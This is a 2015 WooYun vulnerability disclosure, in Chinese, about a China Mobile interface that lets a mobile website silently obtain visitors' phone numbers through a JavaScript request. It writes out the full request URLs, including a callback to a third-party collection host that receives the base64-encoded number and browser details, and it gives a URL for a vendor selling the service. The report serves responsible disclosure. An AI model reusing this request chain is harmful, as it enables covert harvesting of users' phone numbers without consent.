漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-090703
漏洞标题:中国移动某接口泄漏可导致访问网站就获取用户手机号(已经发现网站利用案例)
相关厂商:中国移动
漏洞作者: 路人甲
提交时间:2015-01-13 11:51
修复时间:2015-02-27 11:52
公开时间:2015-02-27 11:52
漏洞类型:未授权访问/权限绕过
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-01-13: 细节已通知厂商并且等待厂商处理中
2015-01-16: 厂商已经确认,细节仅向厂商公开
2015-01-26: 细节向核心白帽子及相关领域专家公开
2015-02-05: 细节向普通白帽子公开
2015-02-15: 细节向实习白帽子公开
2015-02-27: 细节向公众公开
简要描述:
手机网站加载一段js代码后,即可获取到访问者的移动手机号码,获取率很高,通过分析,是移动研究院那边的泄露漏洞!
详细说明:
有商家在出售获取手机号:http://112.124.4.229:808/member/my.php?mid=21&status=4
手机网站加载一段他们提供的js代码后,即可获取到访问者的移动手机号码,获取率很高,通过分析,是移动研究院那边的泄露漏洞!
通过抓包分析可以发现:
注:抓包要用谷歌浏览器伪装成手机访问,不然抓包不到,它们屏蔽了pc!
当用户访问手机网站后,会加载一段js,js请求访问移动研究院的IP:http://218.206.176.104:8080/api/cc.jsp?cmsn=Mm1JeVFaZW9YUjZxVEhoVVc2WGZTUT09&q=http%3A%2F%2F121.40.123.23%2Frecv.php%3F_f%3D185659aff8c4e814a5d3537d9efb98bf_-_id%3Dwxkj_-_inx%3D0_-_ref%3Dhttp%25253A%25252F%25252Flocalhost.com%25252F1.php_-_query%3D%252526id%25253Dwxkj%252526c%25253D3_-corp%3D
获取到手机号之后,会把手机号通过base64加密返回给 js请求的参数q的值,如上面的:
http://121.40.123.23/recv.php?_f=185659aff8c4e814a5d3537d9efb98bf_-_id=wxkj_-_inx=0_-_ref=http%3A%2F%2Flocalhost.com%2F1.php_-_query=%26id%3Dwxkj%26c%3D3_-corp=bnVsbCxNb3ppbGxhLzUuMCAoaVBob25lOyBDUFUgaVBob25lIE9TIDdfMCBsaWtlIE1hYyBPUyBY%20OyBlbi11cykgQXBwbGVXZWJLaXQvNTM3LjUxLjEgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9u%20LzcuMCBNb2JpbGUvMTFBNDY1IFNhZmFyaS85NTM3LjUz
参数corp 的值就是手机信息base64位加密后的,解密后可以发现内容为:
null,Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X; en-us) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53
如果是手机访问网站的话, null 就会是你的手机号,我电脑访问的,所以没手机号
漏洞证明:
修复方案:
封掉即可!
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:7
确认时间:2015-01-16 16:48
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续尝试协调网站管理单位处置。
最新状态:
暂无